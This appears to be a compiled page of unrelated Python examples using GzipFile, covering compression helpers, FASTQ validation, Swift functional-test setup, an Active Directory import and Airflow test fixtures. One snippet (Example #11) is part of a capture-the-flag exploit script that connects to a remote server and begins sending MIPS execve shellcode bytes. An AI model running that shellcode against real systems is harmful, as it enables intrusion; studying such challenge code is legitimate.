def __enter__(self):
     # Buffer the gzip output in memory; on Python 3 this buffer must be
     # io.BytesIO, since GzipFile writes bytes rather than str.
     self._buffer = StringIO()
     self._writer = GzipFile(mode="wb", fileobj=self._buffer)
     return self._writer
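# A matching __exit__ is not shown in the snippet; a minimal sketch, assuming
# the compressed bytes are read back from self._buffer afterwards (the
# `compressed` attribute below is hypothetical):
def __exit__(self, exc_type, exc_value, traceback):
     self._writer.close()  # flush and write the gzip trailer into the buffer
     self.compressed = self._buffer.getvalue()
     return False  # do not suppress exceptions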
Example #2
def process_dmd_files_impl(dmd_files, args):
    out_dir = os.path.dirname(dmd_files[0])

    procrank = open(os.path.join(out_dir, 'b2g-procrank'), 'r').read().split('\n')
    proc_names = {}
    for line in procrank:
        # App names may contain spaces and special characters (e.g.
        # '(Preallocated app)').  But for our purposes here, it's easier to
        # look at only the first word, and to strip off any special characters.
        #
        # We also assume that if an app name contains numbers, it contains them
        # only in the first word.
        match = re.match(r'^(\S+)\s+\D*(\d+)', line)
        if not match:
            continue
        proc_names[int(match.group(2))] = re.sub(r'\W', '', match.group(1)).lower()

    for f in dmd_files:
        # Extract the PID (e.g. 111) and UNIX time (e.g. 9999999) from the name
        # of the dmd file (e.g. dmd-9999999-111.txt.gz).
        basename = os.path.basename(f)
        dmd_filename_match = re.match(r'^dmd-(\d+)-(\d+)\.', basename)
        if dmd_filename_match:
            creation_time = datetime.fromtimestamp(int(dmd_filename_match.group(1)))
            pid = int(dmd_filename_match.group(2))
            if pid in proc_names:
                proc_name = proc_names[pid]
                outfile_name = 'dmd-%s-%d.txt.gz' % (proc_name, pid)
            else:
                proc_name = None
                outfile_name = 'dmd-%d.txt.gz' % pid
        else:
            pid = None
            creation_time = None
            outfile_name = 'processed-' + basename

        # Note: on Python 3 GzipFile opens in binary mode, so mode 'wt' would
        # be needed for print() to write str objects.
        outfile = GzipFile(os.path.join(out_dir, outfile_name), 'w')
        def write(s):  # 's' instead of 'str' to avoid shadowing the built-in
            print(s, file=outfile)

        write('# Processed DMD output')
        if creation_time:
            write('# Created on %s, device time (may be unreliable).' %
                  creation_time.strftime('%c'))
        write('# Processed on %s, host machine time.' %
              datetime.now().strftime('%c'))
        if proc_name:
            write('# Corresponds to "%s" app, pid %d' % (proc_name, pid))
        elif pid:
            write('# Corresponds to unknown app, pid %d' % pid)
        else:
            write('# Corresponds to unknown app, unknown pid.')

        write('#\n# Contents of b2g-procrank:\n#')
        for line in procrank:
            write('#    ' + line.strip())
        write('\n')

        fix_b2g_stack.fix_b2g_stacks_in_file(GzipFile(f, 'r'), outfile, args)
        if not args.keep_individual_reports:
            os.remove(f)
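# Parsing sketch for the filename convention described above:
#   re.match(r'^dmd-(\d+)-(\d+)\.', 'dmd-9999999-111.txt.gz').groups()
#   -> ('9999999', '111')   # UNIX time, then PID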
Example #3
File: asset.py Project: luhn/rocketsled
 def encode(self):
     encoded = super(CompressedAsset, self).encode()
     io = BytesIO()
     with GzipFile(fileobj=io, mode='wb') as gz:
         gz.write(encoded)
     return io.getvalue()
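 # A decode counterpart is not part of the snippet; a minimal sketch of the
 # inverse of encode() above (method name hypothetical):
 def decode(self, data):
     with GzipFile(fileobj=BytesIO(data), mode='rb') as gz:
         return gz.read()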
Example #4
def is_fastq(fastq_file, verbose):
    n_lines_head = 10000

    if not os.path.isfile(fastq_file):
        sys.stderr.write("[E::main] Error: " + fastq_file +
                         ': No such file.\n')
        sys.exit(1)

    try:
        zippedInput = False
        if (fastq_file.endswith(".gz")):
            zippedInput = True
            with GzipFile(fastq_file) as filef:
                head = list(islice(filef, n_lines_head))
        elif (fastq_file.endswith(".bz2")):
            zippedInput = True
            with BZ2File(fastq_file) as filef:
                head = list(islice(filef, n_lines_head))
        else:
            try:
                with open(fastq_file) as filef:
                    head = list(islice(filef, n_lines_head))
            except Exception:
                sys.stderr.write("[E::main] Error loading file: " +
                                 fastq_file + "\n")
                sys.exit(1)
    except Exception:
        sys.stderr.write("[E::main] Error. Cannot load the file " +
                         fastq_file + "\n")
        sys.stderr.write(
            "[E::main] Supported file are zipped .gz or .bz2, or plain text\n")
        sys.exit(1)

    # check min length of fastq file:
    if len(head) < 4:
        sys.stderr.write("[E::main] Error: file " + fastq_file +
                         " is not a fastq file\n")
        sys.exit(1)

    # go through the lines in head
    all_lengths = list()
    cont_line = 1
    cont = 0
    for line in head:
        cont = cont + 1
        if zippedInput:
            line = line.decode('ascii')

        if cont_line == 1:
            if line[0] != "@":
                print_error_fasta("Line does not start with @", cont,
                                  fastq_file)

        if cont_line == 2:
            l1 = len(line)

        if cont_line == 3:
            if line[0] != "+":
                print_error_fasta("Line does not start with +", cont,
                                  fastq_file)

        if cont_line == 4:
            l2 = len(line)
            if (l1 != l2):
                print_error_fasta(
                    "Length of quality line is different from length of the read",
                    cont, fastq_file)
            else:
                all_lengths.append(l1)

        if cont_line != 4:
            cont_line = cont_line + 1
        else:
            cont_line = 1

    if len(all_lengths) < 1:
        sys.stderr.write("[E::main] Error: file " + fastq_file +
                         " is not a fastq file\n")
        sys.exit(1)

    if (all(x == all_lengths[0]
            for x in all_lengths)) and len(all_lengths) > 1:
        if verbose >= 2:
            sys.stderr.write(
                "[W::main] Warning: file " + fastq_file +
                ". The length of the first " + str(len(all_lengths)) +
                " reads is " + str(all_lengths[0]) +
                ". It is suggested to quality control the reads before profiling\n"
            )

    avg_length = sum(all_lengths) / float(len(all_lengths))
    return int(avg_length)
Example #5
def in_process_setup(the_object_server=object_server):
    _info('IN-PROCESS SERVERS IN USE FOR FUNCTIONAL TESTS')
    _info('Using object_server class: %s' % the_object_server.__name__)
    conf_src_dir = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_DIR')
    show_debug_logs = os.environ.get('SWIFT_TEST_DEBUG_LOGS')

    if conf_src_dir is not None:
        if not os.path.isdir(conf_src_dir):
            msg = 'Config source %s is not a dir' % conf_src_dir
            raise InProcessException(msg)
        _info('Using config source dir: %s' % conf_src_dir)

    # If SWIFT_TEST_IN_PROCESS_CONF_DIR specifies a config source dir then
    # prefer config files from there, otherwise read config from source tree
    # sample files. A mixture of files from the two sources is allowed.
    proxy_conf = _in_process_find_conf_file(conf_src_dir, 'proxy-server.conf')
    _info('Using proxy config from %s' % proxy_conf)
    swift_conf_src = _in_process_find_conf_file(conf_src_dir, 'swift.conf')
    _info('Using swift config from %s' % swift_conf_src)

    monkey_patch_mimetools()

    global _testdir
    _testdir = os.path.join(mkdtemp(), 'tmp_functional')
    utils.mkdirs(_testdir)
    rmtree(_testdir)
    utils.mkdirs(os.path.join(_testdir, 'sda1'))
    utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdc1'))
    utils.mkdirs(os.path.join(_testdir, 'sdc1', 'tmp'))

    swift_conf = _in_process_setup_swift_conf(swift_conf_src, _testdir)
    _info('prepared swift.conf: %s' % swift_conf)

    # Call the associated method for the value of
    # 'SWIFT_TEST_IN_PROCESS_CONF_LOADER', if one exists
    conf_loader_label = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_LOADER')
    if conf_loader_label is not None:
        try:
            conf_loader = conf_loaders[conf_loader_label]
            _debug('Calling method %s mapped to conf loader %s' %
                   (conf_loader.__name__, conf_loader_label))
        except KeyError as missing_key:
            raise InProcessException('No function mapped for conf loader %s' %
                                     missing_key)

        try:
            # Pass-in proxy_conf, swift_conf files
            proxy_conf, swift_conf = conf_loader(proxy_conf, swift_conf)
            _debug('Now using proxy conf %s' % proxy_conf)
            _debug('Now using swift conf %s' % swift_conf)
        except Exception as err:  # noqa
            raise InProcessException(err)

    obj_sockets = _in_process_setup_ring(swift_conf, conf_src_dir, _testdir)

    # load new swift.conf file
    if set_swift_dir(os.path.dirname(swift_conf)):
        constraints.reload_constraints()
        storage_policy.reload_storage_policies()

    global config
    config['__file__'] = 'in_process_setup()'
    if constraints.SWIFT_CONSTRAINTS_LOADED:
        # Use the swift constraints that are loaded for the test framework
        # configuration
        _c = dict(
            (k, str(v)) for k, v in constraints.EFFECTIVE_CONSTRAINTS.items())
        config.update(_c)
    else:
        # In-process swift constraints were not loaded, something's wrong
        raise SkipTest

    global _test_socks
    _test_socks = []
    # We create the proxy server listening socket to get its port number so
    # that we can add it as the "auth_port" value for the functional test
    # clients.
    prolis = listen_zero()
    _test_socks.append(prolis)

    # The following set of configuration values is used both for the
    # functional test framework and for the various proxy, account, container
    # and object servers.
    config.update({
        # Values needed by the various in-process swift servers
        'devices': _testdir,
        'swift_dir': _testdir,
        'mount_check': 'false',
        'client_timeout': '4',
        'allow_account_management': 'true',
        'account_autocreate': 'true',
        'allow_versions': 'True',
        'allow_versioned_writes': 'True',
        # TODO: move this into the s3api config loader, since these headers
        #       are required only by s3api
        'allowed_headers':
            "Content-Disposition, Content-Encoding, X-Delete-At, "
            "X-Object-Manifest, X-Static-Large-Object, Cache-Control, "
            "Content-Language, Expires, X-Robots-Tag",
        # Below are values used by the functional test framework, as well as
        # by the various in-process swift servers
        'auth_host': '127.0.0.1',
        'auth_port': str(prolis.getsockname()[1]),
        'auth_ssl': 'no',
        'auth_prefix': '/auth/',
        # Primary functional test account (needs admin access to the
        # account)
        'account': 'test',
        'username': '******',
        'password': '******',
        's3_access_key': 'test:tester',
        's3_secret_key': 'testing',
        # Secondary user of the primary test account (needs admin access
        # to the account) for s3api
        's3_access_key2': 'test:tester2',
        's3_secret_key2': 'testing2',
        # User on a second account (needs admin access to the account)
        'account2': 'test2',
        'username2': 'tester2',
        'password2': 'testing2',
        # User on same account as first, but without admin access
        'username3': 'tester3',
        'password3': 'testing3',
        's3_access_key3': 'test:tester3',
        's3_secret_key3': 'testing3',
        # Service user and prefix (emulates glance, cinder, etc. user)
        'account5': 'test5',
        'username5': 'tester5',
        'password5': 'testing5',
        'service_prefix': 'SERVICE',
        # For tempauth middleware. Update reseller_prefix
        'reseller_prefix': 'AUTH, SERVICE',
        'SERVICE_require_group': 'service',
        # Reseller admin user (needs reseller_admin_role)
        'account6': 'test6',
        'username6': 'tester6',
        'password6': 'testing6'
    })

    acc1lis = listen_zero()
    acc2lis = listen_zero()
    con1lis = listen_zero()
    con2lis = listen_zero()
    _test_socks += [acc1lis, acc2lis, con1lis, con2lis] + obj_sockets

    account_ring_path = os.path.join(_testdir, 'account.ring.gz')
    with closing(GzipFile(account_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
                          [{
                              'id': 0,
                              'zone': 0,
                              'device': 'sda1',
                              'ip': '127.0.0.1',
                              'port': acc1lis.getsockname()[1]
                          }, {
                              'id': 1,
                              'zone': 1,
                              'device': 'sdb1',
                              'ip': '127.0.0.1',
                              'port': acc2lis.getsockname()[1]
                          }], 30), f)
    container_ring_path = os.path.join(_testdir, 'container.ring.gz')
    with closing(GzipFile(container_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
                          [{
                              'id': 0,
                              'zone': 0,
                              'device': 'sda1',
                              'ip': '127.0.0.1',
                              'port': con1lis.getsockname()[1]
                          }, {
                              'id': 1,
                              'zone': 1,
                              'device': 'sdb1',
                              'ip': '127.0.0.1',
                              'port': con2lis.getsockname()[1]
                          }], 30), f)

    # Default to only 4 seconds for in-process functional test runs
    eventlet.wsgi.WRITE_TIMEOUT = 4

    def get_logger_name(name):
        if show_debug_logs:
            return debug_logger(name)
        else:
            return None

    acc1srv = account_server.AccountController(config,
                                               logger=get_logger_name('acct1'))
    acc2srv = account_server.AccountController(config,
                                               logger=get_logger_name('acct2'))
    con1srv = container_server.ContainerController(
        config, logger=get_logger_name('cont1'))
    con2srv = container_server.ContainerController(
        config, logger=get_logger_name('cont2'))

    objsrvs = [(obj_sockets[index],
                the_object_server.ObjectController(config,
                                                   logger=get_logger_name(
                                                       'obj%d' % (index + 1))))
               for index in range(len(obj_sockets))]

    if show_debug_logs:
        logger = get_logger_name('proxy')
    else:
        logger = utils.get_logger(config, 'wsgi-server', log_route='wsgi')

    def get_logger(name, *args, **kwargs):
        return logger

    with mock.patch('swift.common.utils.get_logger', get_logger):
        with mock.patch('swift.common.middleware.memcache.MemcacheMiddleware',
                        FakeMemcacheMiddleware):
            try:
                app = loadapp(proxy_conf, global_conf=config)
            except Exception as e:
                raise InProcessException(e)

    nl = utils.NullLogger()
    global proxy_srv
    proxy_srv = prolis
    prospa = eventlet.spawn(eventlet.wsgi.server,
                            prolis,
                            app,
                            nl,
                            protocol=SwiftHttpProtocol)
    acc1spa = eventlet.spawn(eventlet.wsgi.server,
                             acc1lis,
                             acc1srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    acc2spa = eventlet.spawn(eventlet.wsgi.server,
                             acc2lis,
                             acc2srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    con1spa = eventlet.spawn(eventlet.wsgi.server,
                             con1lis,
                             con1srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    con2spa = eventlet.spawn(eventlet.wsgi.server,
                             con2lis,
                             con2srv,
                             nl,
                             protocol=SwiftHttpProtocol)

    objspa = [
        eventlet.spawn(eventlet.wsgi.server,
                       objsrv[0],
                       objsrv[1],
                       nl,
                       protocol=SwiftHttpProtocol) for objsrv in objsrvs
    ]

    global _test_coros
    _test_coros = \
        (prospa, acc1spa, acc2spa, con1spa, con2spa) + tuple(objspa)

    # Create accounts "test" and "test2"
    def create_account(act):
        ts = utils.normalize_timestamp(time())
        account_ring = Ring(_testdir, ring_name='account')
        partition, nodes = account_ring.get_nodes(act)
        for node in nodes:
            # Note: we are just using the http_connect method in the object
            # controller here to talk to the account server nodes.
            conn = swift.proxy.controllers.obj.http_connect(
                node['ip'], node['port'], node['device'], partition, 'PUT',
                '/' + act, {
                    'X-Timestamp': ts,
                    'x-trans-id': act
                })
            resp = conn.getresponse()
            assert resp.status == 201, 'Unable to create account: %s\n%s' % (
                resp.status, resp.body)

    create_account('AUTH_test')
    create_account('AUTH_test2')
Example #6
# gzipout.py
import sys
from gzip import GzipFile
from StringIO import StringIO

sio = StringIO()
gzf = GzipFile(fileobj=sio, mode='wb')
gzf.write(sys.stdin.read())
gzf.close()

# Output gzipped stream.
sys.stdout.write(sio.getvalue())

# To try it from a shell:
# $ cat textfile | python gzipout.py | zcat

# A socket object used in network programming cannot seek(), so the
# compressed stream is first buffered in a StringIO.

# gzipin.py
from gzip import GzipFile
from StringIO import StringIO

gzstream = open('gzipped.gz', 'rb')
sio = StringIO(gzstream.read())
gz = GzipFile(fileobj=sio, mode='rb')
print gz.read()
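# The two scripts above are Python 2 (StringIO module, print statement).
# A rough Python 3 equivalent of gzipout.py, using io.BytesIO:
import sys
from gzip import GzipFile
from io import BytesIO

bio = BytesIO()
with GzipFile(fileobj=bio, mode='wb') as gzf:
    gzf.write(sys.stdin.buffer.read())
sys.stdout.buffer.write(bio.getvalue())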
Example #7
def unzip(infile, mode="rb", filename=None, **kwargs):
    if "r" not in mode:
        filename = filename or "file"
        z = ZipFile(infile, mode="w", **kwargs)
        fo = z.open(filename, mode="w")
        fo.close = lambda closer=fo.close: closer() or z.close()
        return fo
    z = ZipFile(infile)
    if filename is None:
        filename = z.namelist()[0]
    return z.open(filename, mode="r", **kwargs)


register_compression("zip", unzip, "zip")
register_compression("bz2", BZ2File, "bz2")
register_compression("gzip", lambda f, **kwargs: GzipFile(fileobj=f, **kwargs),
                     "gz")

try:
    import lzma

    register_compression("lzma", lzma.LZMAFile, "xz")
    register_compression("xz", lzma.LZMAFile, "xz", force=True)
except ImportError:
    pass

try:
    import lzmaffi

    register_compression("lzma", lzmaffi.LZMAFile, "xz", force=True)
    register_compression("xz", lzmaffi.LZMAFile, "xz", force=True)
Example #8
def load_gaf_entries(local=True):
    with open_gaf(local=local) as zf:
        with GzipFile(fileobj=zf) as f:
            f_without_comments = (line.decode('utf-8') for line in f
                                  if not line.startswith(b'!'))
            yield from csv.reader(f_without_comments, delimiter='\t')
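# Usage sketch: iterate over the parsed GAF rows (in the GAF format the first
# three columns are DB, DB Object ID, and DB Object Symbol):
# for row in load_gaf_entries():
#     db, db_object_id, symbol = row[0], row[1], row[2]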
Example #9
def getDecompressedBase64Lic(lic):
    return GzipFile(fileobj=cStringIO.StringIO(b64decode(lic))).read()
Example #10
    def post(self):
        try:
            # Initialize report
            report = {'inserted': 0, 'updated': 0, 'total': 0, 'warnings': {}}

            objects_apply_policy = {'computer': [], 'user': []}

            db = self.request.db
            # Read GZIP data
            postedfile = self.request.POST['media'].file
            xmldata = GzipFile('', 'r', 9, StringIO(postedfile.read())).read()

            # Read XML data
            xmldoc = minidom.parseString(xmldata)

            # Get the root domain
            xmlDomain = xmldoc.getElementsByTagName('Domain')[0]
            is_ad_master = self.request.POST['master'] == 'True'
            domain = self._get_domain(self.importSchema[0], xmlDomain,
                                      is_ad_master, report)

            # Convert from AD objects to MongoDB objects
            mongoObjects = {}
            mongoObjectsPath = {}
            for objSchema in self.importSchema:
                objs = xmldoc.getElementsByTagName(objSchema['adName'])
                for adObj in objs:
                    if not adObj.hasAttribute('ObjectGUID'):
                        raise Exception(
                            'An Active Directory object must have an '
                            '"ObjectGUID" attribute.')
                    mongoObject, is_saving = self._convertADObjectToMongoObject(
                        domain, mongoObjects, objSchema, adObj, is_ad_master,
                        report, objects_apply_policy)
                    report['total'] += 1
                    if is_saving:
                        mongoObjects[
                            mongoObject['adDistinguishedName']] = mongoObject
                    mongoObjectsPath[
                        mongoObject['adDistinguishedName']] = mongoObject
            # Order mongoObjects by dependences
            if mongoObjects:
                mongoObjects[domain['adDistinguishedName']] = domain
                mongoObjectsPath[domain['adDistinguishedName']] = domain
                mongoObjects = self._orderByDependencesMongoObjects(
                    mongoObjects, domain)

            # Save each MongoDB objects
            properRootDomainADDN = domain['adDistinguishedName']
            for index, mongoObject in mongoObjects.items():
                if index == properRootDomainADDN:
                    continue
                # Get the proper path ("root,{0}._id,{1}._id,{2}._id...")
                listPath = re.findall(ur'([^, ]+=(?:(?:\\,)|[^,])+)', index)
                nodePath = ','.join(listPath[1:])

                # Find parent
                mongoObjectParent = mongoObjectsPath[nodePath]
                mongoObjectParent = self.collection.find_one(
                    {'_id': mongoObjectParent['_id']})
                path = '{0},{1}'.format(mongoObjectParent['path'],
                                        str(mongoObjectParent['_id']))
                mongoObject['path'] = path
                # Save mongoObject
                self._saveMongoObject(mongoObject)

            # AD Fixes
            admin_user = self.request.user
            chef_server_api = get_chef_api(get_current_registry().settings,
                                           admin_user)
            if is_ad_master:
                for index, mongoObject in mongoObjects.items():
                    if mongoObject['type'] == 'group':
                        if mongoObject['members'] != []:
                            mongoObject['members'] = []
                            self._saveMongoObject(mongoObject)

            for index, mongoObject in mongoObjects.items():
                updateMongoObject = False
                # MemberOf
                if mongoObject['type'] in ('user', 'computer'):
                    if 'memberof' not in mongoObject or is_ad_master:
                        mongoObject['memberof'] = []

                    if 'adPrimaryGroup' in mongoObject and mongoObject[
                            'adPrimaryGroup']:
                        group = mongoObjects[mongoObject['adPrimaryGroup']]
                        if is_visible_group(db, group['_id'], mongoObject):
                            if not mongoObject['_id'] in group['members']:
                                group['members'].append(mongoObject['_id'])
                                self._saveMongoObject(group)

                            if mongoObjects[mongoObject['adPrimaryGroup']][
                                    '_id'] not in mongoObject['memberof']:
                                mongoObject['memberof'].append(mongoObjects[
                                    mongoObject['adPrimaryGroup']]['_id'])
                        else:
                            self._warningGroup(group, mongoObject, report)
                        updateMongoObject = True
                        del mongoObject['adPrimaryGroup']

                    if 'adMemberOf' in mongoObject and mongoObject[
                            'adMemberOf']:
                        for group_id in mongoObject['adMemberOf']:
                            group = mongoObjects[group_id]
                            if is_visible_group(db, group['_id'], mongoObject):
                                if not mongoObject['_id'] in group['members']:
                                    group['members'].append(mongoObject['_id'])
                                    self._saveMongoObject(group)

                                if mongoObjects[group_id][
                                        '_id'] not in mongoObject['memberof']:
                                    mongoObject['memberof'].append(
                                        mongoObjects[group_id]['_id'])
                            else:
                                self._warningGroup(group, mongoObject, report)
                        updateMongoObject = True
                        del mongoObject['adMemberOf']

                # Create Chef-Server Nodes
                if mongoObject['type'] == 'computer':
                    chef_server_node = reserve_node_or_raise(
                        mongoObject['name'],
                        chef_server_api,
                        'gcc-ad-import-%s' % random.random(),
                        attempts=3)
                    ohai_gecos_in_runlist = self.RECIPE_NAME_OHAI_GECOS in chef_server_node.run_list
                    gecos_ws_mgmt_in_runlist = self.RECIPE_NAME_GECOS_WS_MGMT in chef_server_node.run_list
                    if not ohai_gecos_in_runlist and not gecos_ws_mgmt_in_runlist:
                        chef_server_node.run_list.append(
                            self.RECIPE_NAME_OHAI_GECOS)
                        chef_server_node.run_list.append(
                            self.RECIPE_NAME_GECOS_WS_MGMT)
                    elif not ohai_gecos_in_runlist and gecos_ws_mgmt_in_runlist:
                        chef_server_node.run_list.insert(
                            chef_server_node.run_list.index(
                                self.RECIPE_NAME_GECOS_WS_MGMT),
                            self.RECIPE_NAME_OHAI_GECOS)
                    elif ohai_gecos_in_runlist and not gecos_ws_mgmt_in_runlist:
                        chef_server_node.run_list.insert(
                            chef_server_node.run_list.index(
                                self.RECIPE_NAME_OHAI_GECOS) + 1,
                            self.RECIPE_NAME_GECOS_WS_MGMT)
                    save_node_and_free(chef_server_node)
                    chef_server_client = Client(mongoObject['name'],
                                                api=chef_server_api)
                    if not chef_server_client.exists:
                        chef_server_client.save()
                    mongoObject['node_chef_id'] = mongoObject['name']
                    updateMongoObject = True

                # Save changes
                if updateMongoObject:
                    self._saveMongoObject(mongoObject)

            # apply policies to new objects
            for node_type, node_names in objects_apply_policy.items():
                nodes = self.collection.find({
                    'name': {
                        '$in': node_names
                    },
                    'path':
                    get_filter_this_domain(domain),
                    'type':
                    node_type
                })
                for node in nodes:
                    apply_policies_function = globals()['apply_policies_to_%s'
                                                        % node['type']]
                    apply_policies_function(self.collection,
                                            node,
                                            admin_user,
                                            api=chef_server_api)

            # Return result
            status = '{0} inserted, {1} updated of {2} objects imported successfully.'.format(
                report['inserted'], report['updated'], report['total'])
            response = {'status': status, 'ok': True}
        except Exception as e:
            logger.exception(e)
            response = {'status': u'{0}'.format(e), 'ok': False}
        warnings = report.get('warnings', [])
        if warnings:
            response['warnings'] = warnings
        return response
Example #11
b *0x400d40
b *0x400c8c
b *0x400b5c
b *0x400b30
c
''')
    else:
        io = process(['./samples/0'])
else:
    io = remote('106.53.114.216', 9999)
    assert solve_pow(io)
    assert io.recvline() == b'Binary Dump:\n'
    assert io.recvline() == b'===============\n'
    binary_dump_gz_b64 = io.recvline().decode()
    binary_dump_gz = base64.b64decode(binary_dump_gz_b64)
    binary_dump = GzipFile(fileobj=BytesIO(binary_dump_gz)).read()
if args.LOCAL:
    solution = bytes.fromhex(
        'da1ada1abb3dbb3d7def24b6f6fbb7b64b5d1669edf7edf787295cf25999ad717fe4e6c4bbf817b0c01f90c18ffd780a46480093c134fe043f7f3f7f87f361ad'
    )
else:
    solution = emu.solve(binary_dump, 'ctf')
io.send(solution)
io.recvuntil(b'Name\n')
io.send(b'mslc')
io.recvuntil(b'Your time comes.\n> ')
# https://packetstormsecurity.com/files/105611/MIPS-execve-Shellcode.html
io.send(b"\xff\xff\x06\x28"
        b"\xff\xff\xd0\x04"
        b"\xff\xff\x05\x28"
        b"\x01\x10\xe4\x27"
Example #12
 def setUp(self):
     self.file_names = {}
     self.task_id = 'S3ToHiveTransferTest'
     self.s3_key = 'S32hive_test_file'
     self.field_dict = OrderedDict([('Sno', 'BIGINT'),
                                    ('Some,Text', 'STRING')])
     self.hive_table = 'S32hive_test_table'
     self.delimiter = '\t'
     self.create = True
     self.recreate = True
     self.partition = {'ds': 'STRING'}
     self.headers = True
     self.check_headers = True
     self.wildcard_match = False
     self.input_compressed = False
     self.kwargs = {
         'task_id': self.task_id,
         's3_key': self.s3_key,
         'field_dict': self.field_dict,
         'hive_table': self.hive_table,
         'delimiter': self.delimiter,
         'create': self.create,
         'recreate': self.recreate,
         'partition': self.partition,
         'headers': self.headers,
         'check_headers': self.check_headers,
         'wildcard_match': self.wildcard_match,
         'input_compressed': self.input_compressed
     }
     try:
         header = b"Sno\tSome,Text \n"
         line1 = b"1\tAirflow Test\n"
         line2 = b"2\tS32HiveTransfer\n"
         self.tmp_dir = mkdtemp(prefix='test_tmps32hive_')
         # create sample txt, gz and bz2 with and without headers
         with NamedTemporaryFile(mode='wb+', dir=self.tmp_dir,
                                 delete=False) as f_txt_h:
             self._set_fn(f_txt_h.name, '.txt', True)
             f_txt_h.writelines([header, line1, line2])
         fn_gz = self._get_fn('.txt', True) + ".gz"
         with GzipFile(filename=fn_gz, mode="wb") as f_gz_h:
             self._set_fn(fn_gz, '.gz', True)
             f_gz_h.writelines([header, line1, line2])
         fn_gz_upper = self._get_fn('.txt', True) + ".GZ"
         with GzipFile(filename=fn_gz_upper, mode="wb") as f_gz_upper_h:
             self._set_fn(fn_gz_upper, '.GZ', True)
             f_gz_upper_h.writelines([header, line1, line2])
         fn_bz2 = self._get_fn('.txt', True) + '.bz2'
         with bz2.BZ2File(filename=fn_bz2, mode="wb") as f_bz2_h:
             self._set_fn(fn_bz2, '.bz2', True)
             f_bz2_h.writelines([header, line1, line2])
         # create sample txt, gz and bz2 without header
         with NamedTemporaryFile(mode='wb+', dir=self.tmp_dir,
                                 delete=False) as f_txt_nh:
             self._set_fn(f_txt_nh.name, '.txt', False)
             f_txt_nh.writelines([line1, line2])
         fn_gz = self._get_fn('.txt', False) + ".gz"
         with GzipFile(filename=fn_gz, mode="wb") as f_gz_nh:
             self._set_fn(fn_gz, '.gz', False)
             f_gz_nh.writelines([line1, line2])
         fn_gz_upper = self._get_fn('.txt', False) + ".GZ"
         with GzipFile(filename=fn_gz_upper, mode="wb") as f_gz_upper_nh:
             self._set_fn(fn_gz_upper, '.GZ', False)
             f_gz_upper_nh.writelines([line1, line2])
         fn_bz2 = self._get_fn('.txt', False) + '.bz2'
         with bz2.BZ2File(filename=fn_bz2, mode="wb") as f_bz2_nh:
             self._set_fn(fn_bz2, '.bz2', False)
             f_bz2_nh.writelines([line1, line2])
     # Base Exception so it catches Keyboard Interrupt
     except BaseException as e:
         logging.error(e)
         self.tearDown()
Example #13
def _zip_file(file_path):
    gz_file_path = file_path + '.gz'
    with open(file_path, 'rb') as f_in:
        with GzipFile(gz_file_path, 'wb') as f_out:
            shutil.copyfileobj(f_in, f_out)
    return gz_file_path
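# Hypothetical round-trip check for _zip_file (file name assumed):
# src = 'report.txt'
# gz_path = _zip_file(src)
# with GzipFile(gz_path) as gz, open(src, 'rb') as original:
#     assert gz.read() == original.read()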
Example #14
def S3CompressedReader(bucket, path):
    s3 = boto3.resource('s3')
    r = s3.Object(bucket, path).get()
    body = StringIO(r['Body'].read())
    return GzipFile(mode="rb", fileobj=body)
Example #15
File: psur.py Project: shenpingle/tray
def downallfiles3(id, psurobjid, filename, reportid):
    #
    url = "http://www.adrs.org.cn/ADR/cdrAttachment/attachmentDiskManager/"
    #id = "109913972074597010463482100000"
    #psurobjid = "243013972078880790070655100000"
    import random
    some = random.randrange(1000000000000000, 9999999999999999)
    boundary = '-----------------------------' + str(some)
    parts = []

    parts.append('--' + boundary)
    parts.append('Content-Disposition: form-data; name="action"')
    parts.append('')
    parts.append(str("download"))

    parts.append('--' + boundary)
    parts.append('Content-Disposition: form-data; name="id"')
    parts.append('')
    parts.append(id)

    parts.append('--' + boundary + '--')
    parts.append('')

    body = '\r\n'.join(parts)

    header = {
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Host': 'www.adrs.org.cn',
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'keep-alive',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Content-Type': 'multipart/form-data; boundary=%(boundary)s' % {
            "boundary": boundary
        },
        'Referer':
        'http://www.adrs.org.cn/ADR/page/adrpage/psur/viewPsurReport.jsp?fdObjectId=%(objid)s&type=2'
        % {
            "objid": psurobjid
        }
    }

    try:
        common_url = urllib2.Request(url, headers=header)
        response = urllib2.urlopen(common_url, data=body, timeout=120)
        #print "response.info():",response.info()
        from cStringIO import StringIO
        from gzip import GzipFile
        data2 = GzipFile('', 'r', 0, StringIO(response.read())).read()
        response_data = data2
        # Define the directory to create
        import pathDlg
        mkpath = "c:\\mykill\\web\\"
        #mkpath = pathDlg.readini_path()
        path = mkdir(mkpath, psurobjid)
        name = path + "\\" + filename

        print name

        local_file = open(name, "wb")
        local_file.write(response_data)
        local_file.close()
    except (urllib2.HTTPError, urllib2.URLError, socket.error), exception:
        print u"下载出现错误,打印文件信息:", id, psurobjid, filename, reportid
        tempdata = (reportid, psurobjid, filename, id)
        insert_sql = (
            "insert into pusr_dwfinfo_down_error(ReportID, FileID, ShowFileName, BackUp1) "
            "values(%s,%s,%s,%s)")
        mdrsql.mdr_insert_alone(insert_sql, tempdata)
        pass
Example #16
def in_process_setup(the_object_server=object_server):
    _info('IN-PROCESS SERVERS IN USE FOR FUNCTIONAL TESTS')
    _info('Using object_server class: %s' % the_object_server.__name__)
    conf_src_dir = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_DIR')

    if conf_src_dir is not None:
        if not os.path.isdir(conf_src_dir):
            msg = 'Config source %s is not a dir' % conf_src_dir
            raise InProcessException(msg)
        _info('Using config source dir: %s' % conf_src_dir)

    # If SWIFT_TEST_IN_PROCESS_CONF_DIR specifies a config source dir then
    # prefer config files from there, otherwise read config from source tree
